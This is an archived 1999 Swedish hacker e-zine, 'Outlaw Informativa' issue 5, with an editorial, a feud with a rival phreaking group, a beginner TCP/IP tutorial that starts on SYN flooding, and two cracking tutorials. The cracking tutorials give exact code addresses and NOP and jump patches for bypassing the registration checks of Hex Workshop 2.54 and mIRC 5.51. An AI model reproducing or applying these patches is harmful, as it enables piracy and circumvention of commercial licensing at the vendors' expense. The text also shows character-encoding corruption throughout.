informis
/
textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/magazines/SWEDISH/outlaw-05.txt

3301 lines
62 KiB
Plaintext
Raw Normal View History

Initial commit
2021-04-15 11:31:59 -07:00
22:14 1999-05-18
Heretics Inc. Presenterar...
_______ __ __ Informativa
| |.--.--.| |_| |.---.-.--.--.--.
| - || | || _| || _ | | |#5|
|_______||_____||____|__||___._|________|
<20>=======================================<3D>
| |
| <20> Disclaimer |
| <20> Editor |
| <20> Mederkande |
| <20> <20>r 07nio75 riktiga phreakers? |
| |
| <20> Cracka Hex Workshop 2.54 |
| <20> Cracka mIRC 5.51, mIRC Co. Ltd |
| <20> TCP/IP Tutorial f<>r newbies |
| <20> L<>s lokala filer i NT |
| <20> Wingates |
| <20> S<>kerhets h<>l i Netbios |
| <20> nato.int, whitehouse.gov hacked |
| |
| <20> Enkelt om Terminaler |
| <20> GSM kan l<>sa av Elm<6C>tare |
| <20> Cellul<75>r styrning, update |
| <20> Lite rippat om AXE fr<66>n Fidonet |
| <20> Teleutrustning som klarar <20>r2000 |
| |
| <20> Copyright |
| <20> Prenumeration |
| <20> eX1t() |
| |
<20>=======================================<3D>
w w w . h e r e t i c s . c j b . n e t
-Vilka <20>r det som st<73>r misst<73>nkta? <20>r det
unga hackers? Jo, det <20>r unga, men jag
skulle inte vilja kalla dem f<>r hackers
eftersom det ordet ofta f<>rknippas med
n<>gon som <20>r duktig p<> datorer -
+-------------------------------------------------------------+
<20> Disclaimer |
+-------------------------------------------------------------+
Vi tar inget ansvar f<>r vad du andv<64>nder informationen till.
Information <20>r endast till f<>r att l<>sas och i utbildnings
syfte. Myndighetspersonen <20>r f<>rbjudna enligt lag att l<>sa
denna information
+-------------------------------------------------------------+
| Editor [Knash] |
+-------------------------------------------------------------+
Var h<>lsad till issue #5 av Outlaw Informativa !
Visste du att Carl Bilt <20>r homosexuell? N<>HHEJ, jag bara skoja.
Det va en snubbe som klagade lite p<> mig och sa att jag hade
skickat Melissa viruset till honom (!?!?!?!?!) hehe, vilket jag
inte har gjort. Men d<>remot skickade jag k<>llkoden i O-I #4,
men det <20>r en helt annan femma. Zaqe hittade en tele-box med
n<>got slags kretskort i, grymmt..ahh ?? Jaja, i detta nummer
blir det lite blandat, tja..lite networking, telefoni, nt och
lite cracking. De vanligaste s<> klart. Hoppas tty f<>r n<>got
att titta p<> den h<>r g<>ngen.
+-------------------------------------------------------------+
| Medverkande |
+-------------------------------------------------------------+
Knash [knash@linux.nu:keytrace@usa.net]
Gazzaud [Gazzaud@operamail.com]
Overmarzz [mixtile112@hotmail.com]
Axxezz [secure contact]
+-------------------------------------------------------------+
| <20>r 07nio75 riktiga phreakers? [Overmarzz]|
+-------------------------------------------------------------+
Jag surfade in p<> deras sida och kunde snabbt konstatera att
den verkligen inte var bra..
1: P<> Main s<> st<73>r d<>r "...Sveriges aktivaste Phreking grupp.."
Hahaha..Aktiva?...nja..dom springer runt med sina Beige och
"Phreakar" jappasar...japp...d<> <20>r man verkligen Phreaker. Dom
har inga egna txt filer och p<> ezine st<73>r d<>r ex bilder l<>ngst
upp(?). Om ezinet? Samma l<>jliga text om aktivaste grupp och
dom b<>rjar v<>ldigt elit genom att skriva 1ntr0 ..
sen p<> disclaimer..
"Informationen i v<>rat zine <20>r <20>ndast till f<>r att l<>sas, och
om du g<>r n<>got olagligt shit efter at"
LOL...shit..rollie kan engelska..
Beige boxing skola..? Har inte alla svenska phreakers redan
skrivit det?
hmm
all'4'free? iofs s<> heter det everything... Men att sno mm <20>r
inte speciellt sk<73>nt..Boxing lista.. Blast: Bra om du vill spr-
<20>nga n<>ns trummhinna...HAHA..ska en telefon lur lira 145-155
db?? HAHA
---
Heretics?
"Heretics Medlemmar" f<>rst<73>r f<>r 07nio75 medlemmar. Dom p<>stog
att en heretics medlemm vid namnet "Phencier" hadde sparkat och
slitit s<>nder Oizo's Japan. Phencier <20>r inte p<> n<>got s<>tt
aktiv eller medlem i hertics och jag tycker det <20>r v<>ldigt kr<6B>-
ngande av R Tyler att g<> l<>s p<> tangenbordet innan n<>n fakta
ligger p<> bordet. Det oproffitionela uppf<70>randet kan tolkas p<>
m<>nga s<>tt och jag har kr<6B>vt en artikel som reder upp detta i
n<>sta zine. Den listan har jag sett n<>nstans och den <20>r 100%
rippad och <20>versatt
---
Carding..?
Inte bli "bustad" ..hahaha...
Oj vad sv<73>rt f<>r dom att sp<73>ra det..men rollie lurar dem med
sina enast<73>ende kunskaper och till sist har han skrivit
"..Phreaking <20>r inte bara kul, utan <20>ven en <20>verlevnads stil."
Jag sj<73>lv tycker inte riktigt om att "kriga" men han b<>rjade
helt utan fakta...Jag har aldrig sagt att jag <20>r en elit
Phreaker/hacker s<> kom inte oh klaga!
Jag k<>nner 2 medlemmar i 07975..[S]tasS <20>r skit juste men en
REN irc:are ^MaZz^.. Har aldrig Phreakat..Vet inte vad lmhs
eller beige <20>r. Dom har v<>ldigt h<>ga f<>rv<72>ntningar ...HAHAHAHA
+-------------------------------------------------------------+
| Cracka Hex Workshop 2.54 Breakpoint Software [Gazzaud] |
+-------------------------------------------------------------+
[Skydd]
Cindirella/Seriell
Niv<69>: Medel
Ingrepp: NOP/INVERT
-==- F<>rord -==-
F<>r alla er som beh<65>ver en bra Win32 hexeditor, h<>r <20>r en
av mina favoriter. Den <20>r n<>gorlunda liten, 3 897 706 byte
installerad och v<>ldigt kraftfull. Jag har tidigare anv<6E>nt
version 2.00 men efter det att Axxezz p<>pekat f<>rdelen med
den nya versionen s<> laddade jag hem den fr<66>n www.bpsoft. com.
version 2.00 men efter det att Axxezz p<>pekat f<>rdelen med
En hel del buggfixar, men jag m<>ste erk<72>nna att jag <20>r lite
besviken p<> deras protection-scheme. Precis som med The
Customiser sparade jag mina anteckningar f<>r att ge
nyb<79>rjarna lite steg-f<>r-steg.
--// Grabbing the Tools of the Trade \\--
// Str Ref \\
F<>rst kollade jag runt lite efter anv<6E>ndbara str<74>ngreferenser.
Str Ref -> "Demonstration Version"
00429B6E
00429B51 movsx eax, word ptr [0048CFF8]
00429B58 test eax,eax
00429B5A jne 00429B88
Egentligen ingenting anv<6E>ndbart eftersom vi inte har n<>gon
funktion utan bara en kontroll av en variabel. Men kanske
kan vi ha lite tur, s<> vi s<>ker efter [0048CFF8] och hittar
den vid: 00429610, 004299AF, 00429B51. Tyv<79>rr bara kontroller,
ingen funktion som l<>gger n<>got v<>rde i variabeln. S<> mycket
f<>r str<74>ngreferenser. S<> vi tar och b<>rjar nysta i en annan
<20>nde.
-%%- Dialoger -%%-
Som ni ser i data sektionen av HexWorkshop finns det m<>nga
dialoger i programmet. En f<>r f<>rsta g<>ngen vi k<>r programmet,
en f<>r n<>r vi b<>rjar f<> lite tid kvar, en n<>r tiden g<>tt ut men
vi fortfarande har lite "grace time" kvar och en n<>r det <20>r
totalk<6C>rt. En rolig sak <20>r att de ocks<6B> har en dialogruta som
dyker upp om versionen blivit f<>r gammal.
DialogID_0073, referenced at:
00425C55
is referenced by: 004297F0
00461D20 (Drawing the dialog etc)
Observera den h<>r funktionen :
00429776 call 0042E800 (<28>terkommer till den alldeles strax)
DialogID_00C1, referenced at:
004273D5, called by 00429792
Look at 00429776 -> if je, then call 0042EA35 and if ne
there, call 00425C30 which shows DialogID_0073.
Ser ni det m<>rkliga? K<>nner ni lukten av r<>dd kod? K<>nner ni
stanken av deras protection? Jag tror *sniff* best<73>mt *sniff*
att den *sniff* kommer fr<66>n... *sniff*
Registret! Sparka ig<69>ng Regedit (C:\Windoze\Regedit.exe) s<> tar
vi oss en titt.
[HKEY_LOCAL_MACHINE\SOFTWARE\BreakPoint\Hex Workshop\]
CurrentVersion = "2.50" <- varf<72>r inte 2.54?
Path = "Drive:\PAth\HWORKS32.EXE"
Ouw...
[HKEY_LOCAL_MACHINE\SOFTWARE\BreakPoint\Hex Workshop\2.50]
Major = 0xF8F3F830
Minor = 0x00000000
Om ni vill g<> in p<> alla pinsamma detaljer ang<6E>ende detta s<>
tittar ni i funktionerna 0042EA35, 0042E800 & alla de andra som
anropas f<>r att avg<76>ra vilken dialogruta som ska visas. Jag ska
dra en snabbgenomg<6D>ng f<>r alla som <20>r nyfikna men inte orkar
kolla. Trots BreakPoints f<>rs<72>k att visa p<> motsatsen s<> har
Major och Minor ingenting med versionen avprogrammet att g<>ra
(N<>H<EFBFBD>! ;-). Major lagrar ett datum, i mitt fall 7nde December
1999 (B<>st f<>re-datum tydligen), och Minor <20>r en statusvariabe-
l. Testa att <20>ndra Minor till 0xBB000000 och starta HexWorksho-
p. Kul dialogruta, eller hur? Ni kan nu <20>ndra tillbaks om ni
vill, men jag l<>mnade registret s<>d<EFBFBD>r f<>r att veta n<>r vi
lyckats 'registrera' programmet.
--/-/ Nu <20>ver till allvaret \-\--
Alla dessa kontroller mot Registret ligger inom funktion
004295A6, som anropas fr<66>n 0042999A. Denna anrops-snutt av kod
anropas bara beroende p<> ett (C) hopp vid 00429980.
00429978 call 00429403
0042997D cmp eax,1
00429980 jne 0042998D (kontrollerna)
00429986 xor eax,eax
00429988 jmp 00429E9E
Hmmmmm... Intressant? Faktiskt inte ett dugg. Men ibland kan
det vara kul och g<>ra er lite nerv<72>sa :-). Funktion 00429403
kontrollerar bara om det finns en HW.INI, s<>kert pga bak<61>t-kom-
pabilitet till 16-bit.
--{ Trace Main }--
S<> eftersom vi nu har hamnat i programmets Main-sektion
(eller WinMain om vi ska vara riktigt petiga (inte f<>r att det
beh<65>ver vara WinMain i ett Assemblerprogram)). S<> ska vi v<>l ta
och avsluta den h<>r lilla, men ack s<> l<>rorika, utflykten,
eller vad s<>ger ni? Vi kollar igenom alla funktioner som
anropas innan den som vi just kom ifr<66>n (d<>r <20>r det ju redan
best<73>mt om vi <20>r Registrerade eller inte) och hittar 00437540.
Tjohopp. Kunde vi tagit en enklare v<>g?
Jajamensan: Str Ref -> "HEXWORKS.REG",
men d<> hade ni ju missat halva deras protection. Det hade ju
varit illa. S<> ta ett djupt andetag, titta igenom funktionen,
f<>lj koden, k<>nn hur den r<>r sig, vart den g<>r och ta sedan
fram skalpellen och kn<6B>ck HexWorkshop 2.54.
|------------------------------------|
[Slutsats]
004375AC - NOPNOPNOPNOPNOPNOP
004375D5 - NOPNOP
004375FB - E91901000000
Fyll HEXWORKS.REG med 220-250 byte.
-----///: Efterord :\\\-----
S<> nu har vi 'Registrerat' ett i framtiden viktigaste av v<>ra
verktyg. Ska bara ta en liten funderare kring deras protection-
scheme. F<>rst och fr<66>mst tycker jag deras Registry-taktik <20>r i
lite vekaste laget. Vem <20>r den avsedd att lura? Vanliga
anv<6E>ndare? Tror inte dom <20>r inne i Registret och r<>jer allt
f<>r ofta. Crackers? N<>r en nyb<79>rjare som jag lyckas lista ut
deras protection? Ooo, k<>nner trygga BreakPoint. Dessutom
f<>rst<73>r jag inte po<70>ngen med att l<>sa fr<66>n Registret s<> m<>nga
g<>nger, en per eventuell dialog. Om de nu f<>rs<72>kte lura oss att
Minor & Major h<>rde till versionen, varf<72>r inte bara l<>sa in
dessa v<>rden en g<>ng? Ingen sitter och kontrollerar versionen
p<> sitt program, runt fem g<>nger, *i rad*. Deras .REG fil <20>r
inte mycket till skydd heller (som ni m<>rkte), mestadels pga
att den finns med fr<66>n b<>rjan. Tom givetvis, eftersom dom inte
g<>rna kan l<>mna ut ett seriell/anv<6E>ndarnamn. Men hur m<>nga
b<>rjar inte fundera om dom ser en *tom* fil med i sin
installation? Som dessutom slutar p<> <20>ndelsen .REG. S<> hur <20>r
nu .REG uppbyggd? Bra, fr<66>ga. Jag vet inte, och jag t<>nker
heller aldrig ta reda p<> det. <20>nda syftet med det vore f<>r att
g<>ra en KeyGenerator och s<>dant g<>r jag inte. Det har inget med
n<>gon glori<72>s etik att g<>ra, utan bygger mer p<> tv<74> faktum:
vill dom ha ett fungerande program, kn<6B>ck det sj<73>lva och det
faktum att seriellnummer finns det redan flera miljoner lite
<20>verallt p<> n<>tet. Det <20>r ingen som l<>r sig n<>gonting av det.
/// Skriven av:
Gazzaud
@ #SweHack, #Programming.se, #crack
Mailto: Gazzaud@operamail.com
\\\
+-------------------------------------------------------------+
| Cracka mIRC 5.51, mIRC Co. Ltd [Gazzaud] |
+-------------------------------------------------------------+
***************************************************
* *
* mIRC 5.51 *
* *
* mIRC Co. Ltd *
* *
***************************************************
[Skydd]
Cindirella/Seriell
Niv<69>: Enkel
Ingrepp: NOP
-==- F<>rord -==-
F<>r att skapa ett b<>ttre intresse kring cracking (inte malicio-
us hacking utan +ORC's cracking) s<> ska jag f<>rs<72>ka leverera
lite cracks av och om lite mer 'mainstream' program. Annars har
det ju mestadels varit verktyg anv<6E>ndbara f<>r cracking. Alla
vet vad mIRC <20>r, och just nu <20>r 5.51 senaste versionen. Deras
protection <20>r s<> enkelt att det <20>r n<>stan enklare att cracka
deras program <20>n att hitta ett seriellnummer eller ett
'ready-made' crack. Ni ska f<> se.
String Ref "Your registration has been entered
successfully." @ 00436E04
String Ref "Sorry, your registration name and
number don't match!" @ 00436E68
Ref by: (C) 00436D81
00436D7A call 00493CFC
00436D7F test eax,eax
00436D81 je 00436E22
00493CFC is Ref by: 00436D7A, 00493E93
Hmmmm?
N<>e...
[HEX]
00493E9A NOPNOP
00436D81 NOPNOPNOPNOPNOPNOP
--// Avslutning \\--
Jupp. Mer <20>n s<> var det inte. Jag gjorde den lite
avsiktligt kort, eftersom ingen verkar bry sig om
n<>gra utf<74>rligare beskrivningar <20>nd<6E>. Kommentarer
skickas till det vanliga st<73>llet...
// Gazzaud
+-------------------------------------------------------------+
| TCP/IP Tutorial f<>r newbies [Knash] |
+-------------------------------------------------------------+
TCP/IP <20>r ett N<>tverks protokoll som fr<66>n b<>rjan var utvecklat
av ARPAnet. Protokollet som tar hand om en stor del av n<>tv-
erks trafiken. Jag s<>g faktiskt en film om Internet's historia,
titeln p<> filmen var ju lite h<>gt lam faktiskt (Historian om @)
men inneh<65>llet va mycket intressant, dom visade den f<>rsta ser-
vern osv. som s<>g ut som ett kylsk<73>p. TCP/IP st<73>r f<>r Transmis-
sion Control Protocol/Internet Protocol. TCP/IP <20>r <20>ven en del
av kerneln i Unix, <20>ven <20>r TCP/IP ett OSI baserat protokoll
(l<>s om OSI senare i artikeln) F<>r er som inte vet s<> st<73>r OSI
f<>r: Open System Interconnection.
Till Alla Newbies: Internet <20>r ett n<>tverk, faktiskt ett
WAN (Wide Area Nework) allts<74> flera LAN (Local Area Network)
som <20>r ihopkopplade. Fr<46>n b<>rjan va det bara ett LAN som va
baserat p<> TCP/IP, men det va l<>nge sen d<> ARPAnet pysslade.
<20> Open System Interconnection [OSI]
<20> TCP/IP Modellen
<20> TCP Header
<20> TCP Flags
<20> IP Header
<20> UDP Header
<20> Sammanfattning av huvudsyftena i tcp/ip
<20> Vanliga TCP/IP attacker
<20> UDP och TCP, skillnader och nackdelar
<20> Portar som andv<64>nder TCP/IP, UDP
<20> G<> vidare
<20> Efterord
<20> Tack Till
<20> K<>llor
-==- Open System Interconnection [OSI] -==-
OSI modellen <20>r baserat p<> 7 olika lager.
7. Application Layer
6. Presentation Layer
5. Session Layer
4. Transport Layer
3. Network Layer
2. Data Link Layer
1. Physical Layer
Jag tog dom p<> engelska, det ser b<>ttre ut d<>.
Mellan dom olika lagrerna skickas paket, varje lager tar hand
om sin uppgift. , <20>vre lager och nedre lager. N<>r ett
paket skickas fr<66>n din dator passerar den alla 7 lager, fr<66>n 7
ner till 1. N<>r du tar emot ett paket passerar den <20>ven d<> fast
den motsatta v<>gen, fr<66>n 1 upp till 7.
Listan ovan <20>r de standardiserade lagrerna, det kan finnas
andra namn f<>r dem p<> andra platformer.
Man skulle kunna dela upp dom olika OSI Lagrerna i 2
sektioner.
Den <20>vre delen av OSI Modellen tar hand applikationer, och <20>r
ofta redan inprogrammerat i Mjukvaran.
Den l<>gre delen tar hand om transporten av data, IP paket osv.
Physical Layer och Data Link Layer <20>r inprogrammerat i h<>rdvar-
an och mjukvaran.
-{ <20>vre Lagren }-
Application Layer
Presentation Layer
Session Layer
-{ L<>gre Lagren }-
Transport Layer
Network Layer
Data Link Layer
Physical Layer
Application Layer
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Applikations Lagret somboliserar den aktiva applikationen som
arbetar i Exempel: Netskape, Cute FTP, Word, Excel. Texten ell-
er bilden eller vad du nu arbetade med skickas vidare till n<>t-
sta lager.
Presentation Layer
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Detta layer s<>ker i dina bilder, ascii filer efter formaterad
text (typ, font size, font color, typsnitt) Presentation Layer
f<>rs<72>ker <20>ven komprimera informationen s<> att paketet inte ska
bli stort och som ska resultera en snabb tcp/ip connection.
T.ex. en textfil skulle kunna komprimeras 80%, men med en bild
blir det mycket sv<73>rare p<>grund av bin<69>rt inneh<65>ll osv.
Session Layer
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Detta layer tar hand om trafiken och skickar paketen ner<65>t till
de l<>gre lagret.
Transport Layer
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Detta lager l<>gger till l<>sningar fr<66>n CRC (Cyclic Redundancy
Checking) till eller fr<66>n paketet. CRC kontrollerar s<> att
inte paketet har blivit forkortat p<> n<>got s<>tt.
Network Layer
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Konverterar och addresserar. "Logical Adresses" till "Physical
adresses" eller s<> som "nodenumbers" och IP Addresser. Detta
layer ligger v<>ldigt n<>ra h<>rdvaran. Allts<74> tar <20>ven n<>tverks
h<>rdvaran hand om detta, men inte endast!
Data Link Layer
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Detta layer <20>r updelat i tv<74> parter: LLC (Logical Link Control)
och MAC (Medium Access Control) LLC kontrollerar vilket protok-
ll som andv<64>nds och arbetar tillsammans med Layer 3 (Network L-
ayer) MAC tar hand om vilka driv rutiner som anv<6E>nds f<>r de
olika Kommunikations Tillbeh<65>ren. MAC kontrollerar <20>ven
frametype (t.ex. 120.4, 120.3, 120.6)
Physical Layer
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Den h<>rdvaran som beh<65>vs f<>r att kunna kommunicera (t.ex. fibe-
roptik kabel, nollmodem kabel, modem och n<>tverks kort)
Detta funkar ganska enkelt, paketen konverteras till ljus eller
elektriska impulser beroenda op vilken slags <20>verf<72>rings media
man andv<64>nder.
-==- TCP/IP Modellen -==-
TCP/IP modellen best<73>r av 4 olika lager. <20>ven h<>r kan man f<>rd-
ela lagrerna i 2 olika sektioner vilket <20>r ganska enkelt att
gissa.
Application Layer
Transport Layer
Internet Layer
Network / Physical Layer
Network / Physical Layer (N<>tverk / Fysiskt lager)
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
TCP/IP har en grymmt minimal uppgift att ta hand om N<>tverks o-
ch de fysiska lagret. Eftersom det mesta l<>mnas <20>t h<>rdvaran...
s<> som N<>tverks kort och Modem.
Internet Layer
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<20>r ett av de viktigista lagrerna eftersom den tar hand om addr-
essering av IP paket. Den tar ocks<6B> hand om v<>xling av paketen
(Packet Routing)
Transport Layer
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Juppz, detta <20>r ocks<6B> ett mycket viktigt lager (checka bara p<>
namnet, s<> fattar du) Transporterings lagret tar emot data fr-
<20>n Applikations Lagret (Application Layer) som sedan Transport
Lagret f<>rbereder f<>r att sedan bli utskickat i N<>tverket.
Det finns 2 olika typer av transport lager protokoll, UDP och
TCP, UDP st<73>r f<>r User Datagram Protocol.
Application Layer
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<20>r ofta inprogrammerat i kommunikations program, t.ex. web bro-
wsers, FTP klienter, Telnet Klienter osv. Applikations Protoko-
llet definerar gr<67>nssnitt genom olika applikationer (program).
-==- TCP Header -==-
Alla TCP/IP "Headers" och "Layers" kommunicerar med varandra
och det <20>r i princip det som <20>r grejen med TCP/IP networking.
Jag t<>nker inte f<>rklara allt i detalj n<>r det g<>ller TCP Head-
ern och det finns 2 anledningar till det: Jag kan inte s<> myck-
et om TCP Headern <20>ver huvudtaget och att detta ska bara vara
ganska grunl<6E>ggande.
TCP Header
<20> <20>
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<20> SRC PORT <20> DST PORT <20>
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<20> SEQUENCE NUMBER <20>
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<20> ACK NUMBER <20>
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<20> DATA <20> Reserved <20> U|RST|S <20> Windows <20>
<20> OFFSET <20> Field <20> F|A|P <20> Field <20>
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<20> CHECKSUM <20> URGENT PTR <20>
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<20> <20>
SRC Port (Source Port)
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
D<>r datorn s<>nder ut paketet skriver porten paket skickas
ifr<66>n och skickar iv<69>g det.
Size: 16 bit
DST Port (Destination Port)
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<20>r dit paketet ska, SRC port skickar paketet och DST port tar
emot den.
Size: 16 bit
Sequence Number
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Identifierar paketets plats f<>ljd av sekvens TCP <20>verf<72>ringen.
Size: 32 bit
ACK Number
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
ACK St<53>r f<>r acknowledgement som sen sammanbinder acknowledge-
ment number. ACK paketet tar SEQ numret fr<66>n det paket den ska
verifiera och helt enkelt <20>kar med 1 (satt p<> on) N<>r en conn-
ection <20>r etablerad <20>r alltid <20>r ACK allid skickat.
Size: 32 bit
DO
<20><>
DO <20>r en synonym och st<73>r f<>r Data Offsets (All teknik som <20>r
uppdelat i ett flertal delar andv<64>nder alltid synonymer, t.ex.
telefonv<6E>xlar, internet protokoll) DO <20>r ett nummer som indik-
erar var datan b<>rjar.
Size: 4 bit
Reserved Field
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<20>r ett reserverat f<>lt f<>r obest<73>mda tillf<6C>llen d<> data ska
<20>verf<72>ras osv. Reserved Field <20>r alltid <20>r satt p<> (0)
Size: 4 bit
RST
<20><><EFBFBD>
Reset Flag <20>terst<73>ller en connection.
S
<20>
Syn Flag, det finns n<>got som kallas f<>r TCP SYN Flooding d<>r
buggar i TCP systemet utnyttjas. SYN st<73>r f<>r synchronize sequ-
encenumber.
L<>t oss s<>ga att en klient f<>r<EFBFBD>sker etablera en connection med
en server. Klienten och Servern v<>xlar ett s<>tt med olika mede-
landen f<>r att bilda en inre data struktur f<>r att kunna klara
kontakten med servern (Har jag fel?)
Denna lilla sak kallas f<>r 3-Way Handshake.
______________________________________________
TCP Connection Establishment (3-way handshake)
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
3-way handshake b<>rjar n<>r klienten startar en "Connection Req-
uest" genom att <20>verf<72>ra ett SYN Medelande till servern. N<>r
servern tar emot SYN Medelandet s<> skapar servern en "entry"
i serverns oavgjorda TCP connection DATA struktur och skickar
ett SYN-ACK medelande som svar till klienten. Klienten avslutar
"3-way handshake" genom att svara med ett ACK medelande till
servern. Var kommer TCP SYN Flooding in i bilden ? .. jo f<>r
att attacken (Flood) m<>ste kunna skicka <20>ver data till datorn
